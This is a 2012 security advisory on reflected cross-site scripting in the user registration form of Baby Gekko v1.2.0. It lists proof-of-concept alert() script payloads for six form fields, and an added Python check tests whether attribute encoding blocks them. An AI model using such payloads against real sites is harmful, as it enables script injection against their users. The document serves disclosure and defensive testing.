SSCHADV2012-012 - Baby Gekko v1.2.0 Multiple XSS vulnerabilities
Advisory: | Baby Gekko v1.2.0 Multiple XSS vulnerabilities |
Advisory ID: | SSCHADV2012-012 |
Author: | Stefan Schurtz |
Affected Software: | Successfully tested on Baby Gekko v1.2.0 |
Vendor URL: | http://www.babygekko.com/ |
Vendor Status: | informed |
======================
Vulnerability Description
======================
Baby Gekko v1.2.0 is prone to multiple cross-site scripting vulnerabilities.
==============
PoC-Exploit
==============
http://[target]/gekkocms/users/action/register
Reflected XSS (Tested on WinXP with IE8)
Desired Username | ‘"/><script>alert(1)</script> |
E-mail address | ‘"/><script>alert(2)</script> |
Password | ‘"/><script>alert(3)</script> |
Verify Password | ‘"/><script>alert(4)</script> |
First Name | ‘"/><script>alert(5)</script> |
Last Name | ‘"/><script>alert(6)</script> |
Reflected XSS (Tested on WinXP with FF7.0.1 and FF12)
When the username or the e-mail address already exists, the following XSS are also possible!
Desired Username | <already registered> |
E-mail address | <already registered> |
Password | ‘"/><script>alert(1)</script> |
Verify Password | ‘"/><script>alert(2)</script> |
First Name | ‘"/><script>alert(3)</script> |
Last Name | ‘"/><script>alert(4)</script> |
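Every payload above opens with a quote and "/>", the shape that closes an HTML attribute value before starting a script element. The following regression check is an added example, not code from the advisory or from Baby Gekko: it assumes the registration form echoes submitted values back into value attributes, and the input names, render_form, FormAudit and audit are hypothetical. It renders the six fields with and without attribute-context encoding and parses the result the way a browser would tokenize it.

```python
import html
from html.parser import HTMLParser

# Labels from the advisory's form; the input names themselves are assumed.
FIELDS = ["username", "email", "password", "verify_password",
          "first_name", "last_name"]
# Constructed test input in the shape the advisory reports.
PAYLOAD = "'\"/><script>alert(1)</script>"


def render_form(values, encode):
    """Re-render the form with submitted values, as after a validation error."""
    rows = []
    for name in FIELDS:
        value = values.get(name, "")
        if encode:
            # Encode &, <, > and both quote characters for attribute context.
            value = html.escape(value, quote=True)
        rows.append(f'<input name="{name}" value="{value}"/>')
    return "\n".join(rows)


class FormAudit(HTMLParser):
    """Counts script elements and records each input's parsed value."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.values = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            attr = dict(attrs)
            self.values[attr.get("name")] = attr.get("value")


def audit(encode):
    """Return (injected script tags, fields whose value survived intact)."""
    submitted = {name: PAYLOAD for name in FIELDS}
    parser = FormAudit()
    parser.feed(render_form(submitted, encode))
    parser.close()
    intact = [n for n in FIELDS if parser.values.get(n) == PAYLOAD]
    return parser.script_tags, intact


if __name__ == "__main__":
    print("unencoded:", audit(encode=False))
    print("encoded:  ", audit(encode=True))
```

A field counts as intact only when the parsed attribute value equals what was submitted, so the check fails both when markup is injected and when the value is truncated at the attribute boundary.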
=====
Solution
=====
-
================
Disclosure Timeline
================
05-May-2012 – vendor informed
05-May-2012 – vendor feedback
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-012.txt
http://www.babygekko.com/forum/index.php/topic,349.0.html
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5086.php
http://secunia.com/advisories/49023/
http://www.exploit-db.com/exploits/18827/